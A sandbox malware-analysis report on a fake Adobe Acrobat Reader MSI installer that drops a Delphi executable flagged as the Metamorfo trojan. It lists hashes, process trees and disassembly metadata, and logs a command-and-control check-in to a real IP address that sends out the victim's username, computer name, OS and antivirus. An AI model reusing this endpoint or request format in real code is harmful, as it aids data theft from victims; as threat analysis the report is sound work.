SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFC63EC7295EC9676.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.14466924205068643
Encrypted:	false
SSDEEP:	48:eTDxTeqbvSCqbOqbvSCqbRAECiCyueoWQ4:q+VECYn
MD5:	21E51378071081E6850934D4427DF8CD
SHA1:	EA869D2BFC74E6C9159A9573E9A56D850BA42741
SHA-256:	50597072077B35578B057BCBE3C1905CCC6C85986FCAD500A545615E83D7E277
SHA-512:	FD22C366BD39442C4955AD6F36765DF7B2DA652C1382CD86C7A740435637D7F14FA92D869861011409E30C212DC7E2A74CDE55A9E2EAB50F5BA81CFE36E6673B
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFD16C7A82B28A400.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2666637587138507
Encrypted:	false
SSDEEP:	48:Rdmu7M+CFXJtT57wYEqbvSCqbRAECiCyueowqbvSCqblTTZT:XmhFTVl3VECd
MD5:	62608921BD1352AA628EDEF44CBB9199
SHA1:	EE1C049A318D2FE3D58321062BC3B89EE71598E6
SHA-256:	EB0F0C22FE06D6A02F622D193D6A334BFB20A0051DDC510F7AC37641CA29BFA3
SHA-512:	90AF457439F266ABA29630ABC50113C35A2E0F25FDEA089CDFB155ED76C276EF621F23CA3E173408CA1B5E38C3541A137F0A1B25C63185F0E98E34996F1F0627
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {D69B9218-2190-4716-88FD-CE4B13CFF25A}, Number of Words: 10, Subject: Adobe Acrobat Reader, Author: Adobe Acrobat Reader, Name of Creating Application: Adobe Acrobat Reader (Evaluation Installer), Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Adobe Acrobat Reader. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Nov 22 02:10:54 2023, Last Saved Time/Date: Wed Nov 22 02:10:54 2023, Last Printed: Wed Nov 22 02:10:54 2023, Number of Pages: 450
Entropy (8bit):	7.988485483123201
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	Adobe_Acrobate_Reader_Pro-HAv70.msi
File size:	41'085'952 bytes
MD5:	9175fed68d5d38dee94bbd059f9ed69a
SHA1:	cb094b6eb86a9fb8c8bcb5a3a7567cc72858eaaa
SHA256:	d8fc4f696f4bd1899ed92d8e9767646308c941cac2ea826dbdd3e64f6926db3d
SHA512:	728655b5769fb124e2be95d8eaf1608060e0b14f9785dc0697bb51645e9cb64e1a0074977757f8f723b35a981cbbfc3895aed84d816ba7465032165de9a0ca2e
SSDEEP:	786432:R59Ebw+dsspl4SB/MO46JBwcAtIcYNDFJxwQz5lbgB6XmtSVx:j9EXduS2xS9BJSQz5lEshV
TLSH:	83973321B7878536E65C8436E959FF0F49B5BE73433181D3B7E8782A48F48C1E5B8A42
File Content Preview:	........................>...................s...................................F.......c.......o.......................................................u......................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4185.228.72.21249734802833187 12/10/23-03:11:38.566092	TCP	2833187	ETPRO TROJAN Win32/Metamorfo CnC Checkin	49734	80	192.168.2.4	185.228.72.212

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2023 03:11:38.324326038 CET	49734	80	192.168.2.4	185.228.72.212
Dec 10, 2023 03:11:38.565171957 CET	80	49734	185.228.72.212	192.168.2.4
Dec 10, 2023 03:11:38.565390110 CET	49734	80	192.168.2.4	185.228.72.212
Dec 10, 2023 03:11:38.566092014 CET	49734	80	192.168.2.4	185.228.72.212
Dec 10, 2023 03:11:38.848278046 CET	80	49734	185.228.72.212	192.168.2.4
Dec 10, 2023 03:11:38.848591089 CET	49734	80	192.168.2.4	185.228.72.212
Dec 10, 2023 03:11:39.098027945 CET	80	49734	185.228.72.212	192.168.2.4
Dec 10, 2023 03:11:39.140896082 CET	49734	80	192.168.2.4	185.228.72.212
Dec 10, 2023 03:11:44.109528065 CET	80	49734	185.228.72.212	192.168.2.4
Dec 10, 2023 03:11:44.109671116 CET	49734	80	192.168.2.4	185.228.72.212

HTTP Request Dependency Graph

185.228.72.212

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	185.228.72.212	80	6764	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2023 03:11:38.566092014 CET	277	OUT	POST /contador/serv.php HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 141 Host: 185.228.72.212 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Dec 10, 2023 03:11:38.848591089 CET	141	OUT	Data Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 61 6d 39 75 5a 58 4d 26 63 6e 61 6d 65 3d 4e 54 67 31 4f 54 51 34 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48 4a 76 49 44 Data Ascii: vv=10&vw=&mods=&uname=am9uZXM&cname=NTg1OTQ4&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg
Dec 10, 2023 03:11:39.098027945 CET	254	IN	HTTP/1.1 200 OK Date: Sun, 10 Dec 2023 02:11:38 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 X-Powered-By: PHP/8.0.28 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	03:11:01
Start date:	10/12/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Adobe_Acrobate_Reader_Pro-HAv70.msi"
Imagebase:	0x7ff6ef060000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:11:01
Start date:	10/12/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6ef060000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:11:03
Start date:	10/12/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 8E3B84DC866BDAAB5E29174467276D64
Imagebase:	0x950000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:11:05
Start date:	10/12/2023
Path:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
Imagebase:	0x400000
File size:	27'339'496 bytes
MD5 hash:	48D732A19514BEF06ACC712F43FA7D65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe, Author: Joe Security
Antivirus matches:	Detection: 2%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	03:11:46
Start date:	10/12/2023
Path:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe"
Imagebase:	0x400000
File size:	27'339'496 bytes
MD5 hash:	48D732A19514BEF06ACC712F43FA7D65
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:11:56
Start date:	10/12/2023
Path:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe"
Imagebase:	0x400000
File size:	27'339'496 bytes
MD5 hash:	48D732A19514BEF06ACC712F43FA7D65
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	58.3%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 1CC0570A Relevance: 1.6, APIs: 1, Instructions: 71
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationThread.NTDLL ref: 1CC05796

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 06f93ff781e8f590851facbaec9159081e8d33b469f26d3273f4d73b622ef921
Instruction ID: c3414b880530f57f5f22042fb3c080e79d86e627840c3c4ab8f0463cce5144bf
Opcode Fuzzy Hash: 06f93ff781e8f590851facbaec9159081e8d33b469f26d3273f4d73b622ef921
Instruction Fuzzy Hash: AF2167345082614BCB04EF39E4616EF73E1EFC5305F9545AE90C68B185CF305826CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 1CB06B1B Relevance: 1.5, APIs: 1, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDelayExecution.NTDLL(8F1EB602,25ACCA99), ref: 1CB06B39

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB06000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb06000_Adobe Acrobat Pro.jbxd

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: c5f6aaad8cc71f92fe5f516c387ec6abbb311dad2ff00ad4f04a56c73760b34b
Instruction ID: be5f41940aefa65c52b8beb2b26bd2228e6a93c048552ad88e4122d9f97a48bd
Opcode Fuzzy Hash: c5f6aaad8cc71f92fe5f516c387ec6abbb311dad2ff00ad4f04a56c73760b34b
Instruction Fuzzy Hash: 031148381147078BDB18EF19DC814AEB3A2FFC8300F24663DD95983394DB396A65CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1CA517E2 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 1CA5182B

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0ab5a61c3c4673f516abbef84e7e0b161b55eb0c66170b15f3c84762d6c60378
Instruction ID: d844c4c7108c69329e517c9ef38f6b2ddfad3d59b4d99f54dd8ad4296a2f480e
Opcode Fuzzy Hash: 0ab5a61c3c4673f516abbef84e7e0b161b55eb0c66170b15f3c84762d6c60378
Instruction Fuzzy Hash: 89F0C832544657CFC310DF14E9410A977E0AFC6360F60497EC454DB194E7306E19DB65

Uniqueness

Uniqueness Score: -1.00%

Function 1CB5F601 Relevance: 1.5, APIs: 1, Instructions: 12
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 1CB5F605

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2157dcb437eb8e4d09dcb72813839586e9a91ddd4fae1ce6daccc86f77cd44e6
Instruction ID: 5cddc3995a6dac749f249da4c31ab35572b7f9ecae920cead4e591566ed0bc8e
Opcode Fuzzy Hash: 2157dcb437eb8e4d09dcb72813839586e9a91ddd4fae1ce6daccc86f77cd44e6
Instruction Fuzzy Hash: E5D05E72C60244AB87048E50880148B73F3EBC0300F214518951467308D7386E228BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C9ADF7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 19C9AF6E

Strings

>3, xrefs: 19C9AE0E

Memory Dump Source

Source File: 00000008.00000002.2538328558.0000000019C9A000.00000020.00000001.01000000.00000004.sdmp, Offset: 19C9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19c9a000_Adobe Acrobat Pro.jbxd

Similarity

API ID: ProtectVirtual
String ID: >3
API String ID: 544645111-3217844372
Opcode ID: ea0d80d2d29aa787bf46b904916ba7903533fb533ccc14aa20d76fbd27053d3a
Instruction ID: 28620baaf531e118d90f87591ddb9b18e203713de5b3f14613f346eda5526d99
Opcode Fuzzy Hash: ea0d80d2d29aa787bf46b904916ba7903533fb533ccc14aa20d76fbd27053d3a
Instruction Fuzzy Hash: 8541753A508B114FD718EF29C8800AE73D2EFC4320F618A3DD5968B6A5DF34A906CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9A1CF Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad0344c772304c48b7e28f51d7176521dc56d8d3a167ab71078e23791a391eb7
Instruction ID: ac93ab8cce649970986e5306eb4e8658e2081d3d32ba7ad0ea41f4e54de95ad2
Opcode Fuzzy Hash: ad0344c772304c48b7e28f51d7176521dc56d8d3a167ab71078e23791a391eb7
Instruction Fuzzy Hash: 0D017B314182508FCB19DB5DDAD05DFB3E0FF85318F14962ED49387182EB21655A9F51

Uniqueness

Uniqueness Score: -1.00%

Function 19E5E6FD Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2538328558.0000000019E5E000.00000020.00000001.01000000.00000004.sdmp, Offset: 19E5E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19e5e000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff49da9e486535efca751f13c6becbfd2e47e171152bd070dbafdc55f692c742
Instruction ID: f58586ae727dcfdc6c86d155eecef1f7530c95bed2f72d35787f103598fe4e39
Opcode Fuzzy Hash: ff49da9e486535efca751f13c6becbfd2e47e171152bd070dbafdc55f692c742
Instruction Fuzzy Hash: 240176796246138BC318DF3C9C881BA73A2ABCD331714CB2C84AAC32D8EE34A1018744

Uniqueness

Uniqueness Score: -1.00%

Function 19E1F065 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2538328558.0000000019E03000.00000020.00000001.01000000.00000004.sdmp, Offset: 19E03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19e03000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4190f7e501501b81414683a113e66a26e225786b5b09ea2f58a8179e85adaa
Instruction ID: 108203e7541562ffd4f74743a0e37046dfea75efab174c7a81337251110807f4
Opcode Fuzzy Hash: 1c4190f7e501501b81414683a113e66a26e225786b5b09ea2f58a8179e85adaa
Instruction Fuzzy Hash: 20E0261981C340AFD708A7B8A9B106B76F1AF80210BA8586DF0CA8A641F95BA0019592

Uniqueness

Uniqueness Score: -1.00%

Function 1B39F4ED Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2cd17af116aaf57f0a9dc5cd77317fd0a0bb9e601db1b14395633d03b07741
Instruction ID: df93abc6d443233f3d2e3abb3e656bf706196d94242a01fa828624cd1dffaf1f
Opcode Fuzzy Hash: 7b2cd17af116aaf57f0a9dc5cd77317fd0a0bb9e601db1b14395633d03b07741
Instruction Fuzzy Hash: 62C01239A11601CF97208F34994018A77B36BC0740B9E8524D45957500D734F6448B91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1B3C6E6A Relevance: 10.3, Strings: 8, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h, xrefs: 1B3C7069
4, xrefs: 1B3CA44E
(, xrefs: 1B3B9E21
a, xrefs: 1B3C6F19
b, xrefs: 1B3B058C
*9,h, xrefs: 1B3C6ECE
c, xrefs: 1B3C6F22
A, xrefs: 1B3C7146

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ($*9,h$4$A$a$b$c$h
API String ID: 0-1849047734
Opcode ID: 0dd8a4f1b867b98723014b6079dbaa7ed557588534470493b0c258cb31ff8357
Instruction ID: e10f8059e6feb284f2b07ea6ade1b5837cfefebb1f711df0324a4416369fbdc7
Opcode Fuzzy Hash: 0dd8a4f1b867b98723014b6079dbaa7ed557588534470493b0c258cb31ff8357
Instruction Fuzzy Hash: 20D166392087528BC719EF28D4904EBB7E1FFC5310FA08A3ED4D68B695DB399516CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B399A71 Relevance: 6.5, Strings: 5, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?d/1, xrefs: 1B39CE1B
', xrefs: 1B3A40EC
!, xrefs: 1B3A4115
%, xrefs: 1B399AC2
C, xrefs: 1B399B35

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !$%$'$?d/1$C
API String ID: 0-712467936
Opcode ID: 7bc2ecab5d1a4fc1b35b49549f9eb78b99e3c896f29d8be780a590df7f571d9d
Instruction ID: 4ba42b58de8b7fa7df8425a3f84df1f5bca9a401c08487473de4adceb4fd6a47
Opcode Fuzzy Hash: 7bc2ecab5d1a4fc1b35b49549f9eb78b99e3c896f29d8be780a590df7f571d9d
Instruction Fuzzy Hash: E49198352087438BCB09EB78E8914EBB7E2EFC6314F949A2DD495CB2D5E738611AC741

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBC638 Relevance: 6.4, Strings: 5, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 1ADBC722
f, xrefs: 1ADBC63C
<, xrefs: 1ADB8B97
[, xrefs: 1ADBC6B7
A, xrefs: 1ADBC686

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !$<$A$[$f
API String ID: 0-2186464238
Opcode ID: 894ad41f0e76ed1e318c48d2da78a38b99df3c8056f207be6843e740a23373d9
Instruction ID: af20c39d4837708365e7098a990f2b8aad2f3c41a7ef9abb2d7c2e3404a91fed
Opcode Fuzzy Hash: 894ad41f0e76ed1e318c48d2da78a38b99df3c8056f207be6843e740a23373d9
Instruction Fuzzy Hash: 8B41F5741083818BC71CEF68D4905AAFBE1BFC6310F25897DD8924B692CB39A555DB82

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A54AA Relevance: 5.3, Strings: 4, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

g, xrefs: 1B3A55B8
g, xrefs: 1B3B1BD8
a, xrefs: 1B3B1D43
M, xrefs: 1B3B1BE9

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: M$a$g$g
API String ID: 0-3223921291
Opcode ID: 9a55cb57d37b4288de498a5eb5add4ccf97682ef2ae13ab5ccdf9adb6d960842
Instruction ID: 867697fe89fb05cf7d92f05b9486af77c06ec27e317bfa88beaa584a9b3c38d5
Opcode Fuzzy Hash: 9a55cb57d37b4288de498a5eb5add4ccf97682ef2ae13ab5ccdf9adb6d960842
Instruction Fuzzy Hash: 6DA15A796087468BC714EF38D4948ABB7E1EFC9310F208A7D90D6CB699EB359816CF01

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB114A Relevance: 5.1, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S, xrefs: 1ADC553E
(, xrefs: 1ADB11BD
W, xrefs: 1ADC55AE
/, xrefs: 1ADC5563

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ($/$S$W
API String ID: 0-4225751553
Opcode ID: 297ed6b084e2f749264b287466b038789aad3111c5687f09a6399ea4072c8d21
Instruction ID: 39f34f254ee6e0171cb38bbd6937405a862e7e734a6609e24550a0973317f499
Opcode Fuzzy Hash: 297ed6b084e2f749264b287466b038789aad3111c5687f09a6399ea4072c8d21
Instruction Fuzzy Hash: DA4115351087028FD319DF38D5918E7B3E2EBC4324FA09A2DE5968B1D5DB75A069CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBF2C8 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

!/)g, xrefs: 1ADBF307
e, xrefs: 1ADBF416
c, xrefs: 1ADBF398
80v, xrefs: 1ADBF3A1

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !/)g$80v$c$e
API String ID: 0-865063338
Opcode ID: a969d2402f0bd2cff22ca118f9b80f0aa47908318557aae81a8279159e81132d
Instruction ID: bbc8e99a3740ec9f961afa55de63fabcd944bb356ee336ce13079fe947aa3336
Opcode Fuzzy Hash: a969d2402f0bd2cff22ca118f9b80f0aa47908318557aae81a8279159e81132d
Instruction Fuzzy Hash: F0310E341083019FD719EB28E4919ABB7E4EFC5324F608E7ED489CB1C2DB31944ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 1B39CF44 Relevance: 3.9, Strings: 3, Instructions: 177COMMON

Download Yara Rule

Strings

&, xrefs: 1B39CF5C
T, xrefs: 1B39CFA1
*, xrefs: 1B39D033

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: &$*$T
API String ID: 0-264741549
Opcode ID: d2a00660f1fcb6e16e633c71edb1139c5188677f06fcebc07cea8c745ffe403d
Instruction ID: 850d6dc7e7d025d47de18716f5af75eb6cb87199eddb07feb4f9bfcd259454a5
Opcode Fuzzy Hash: d2a00660f1fcb6e16e633c71edb1139c5188677f06fcebc07cea8c745ffe403d
Instruction Fuzzy Hash: 326164756087024FD718DF38D8805AAB7E2FBD9300F50DA3DD086CB2A6EB34A51ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A85A8 Relevance: 3.9, Strings: 3, Instructions: 170COMMON

Download Yara Rule

Strings

$, xrefs: 1B3A8610
D, xrefs: 1B3A8625
c, xrefs: 1B3B7540

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: $$D$c
API String ID: 0-2415112936
Opcode ID: 4ac0e8f2c37506e11731ba9dd6585379caef2d2e07f9d8834f0ffcdab4b466a5
Instruction ID: fc46dbbcaf6313aa1461fcbb629c2c20ee77a974111b60e3ff4322d3db6b744e
Opcode Fuzzy Hash: 4ac0e8f2c37506e11731ba9dd6585379caef2d2e07f9d8834f0ffcdab4b466a5
Instruction Fuzzy Hash: D75169755087128FEB18DF38D4A04EBB7E2EFD5324F509A2ED092C7695EB356119CB01

Uniqueness

Uniqueness Score: -1.00%

Function 1B396BD2 Relevance: 3.9, Strings: 3, Instructions: 159COMMON

Download Yara Rule

Strings

e, xrefs: 1B396CC5
F, xrefs: 1B396C98
", xrefs: 1B3CF815

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$F$e
API String ID: 0-3931387411
Opcode ID: 73527e5d9edde78cfe662e19d5c3eef9aa7f02c2511a2fb29ce99fdc5d5247f1
Instruction ID: d9ccfecf685afd9f0b260dbe243a93f673de77c889a54e7773ffc37f859b4c92
Opcode Fuzzy Hash: 73527e5d9edde78cfe662e19d5c3eef9aa7f02c2511a2fb29ce99fdc5d5247f1
Instruction Fuzzy Hash: 7A51433920C7828BD714EB38E45449BBBE1EFD6320F248A2ED4C5875D2E334911ADB06

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B046A Relevance: 3.9, Strings: 3, Instructions: 151COMMON

Download Yara Rule

